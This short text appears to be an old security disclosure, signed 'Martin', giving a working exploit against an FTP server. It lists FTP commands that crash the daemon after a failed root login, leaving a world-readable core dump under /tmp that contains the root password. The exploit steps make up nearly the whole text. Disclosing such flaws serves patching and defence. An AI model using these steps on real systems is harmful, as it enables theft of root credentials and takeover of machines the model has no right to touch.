Exploit:

   logon via ftp with your regular user/password,
   ftp> cd /tmp
   ftp> user root wrongpasswd
   ftp> quote pasv
   voila, root password in world readable core
   dump under /tmp
                                   -Martin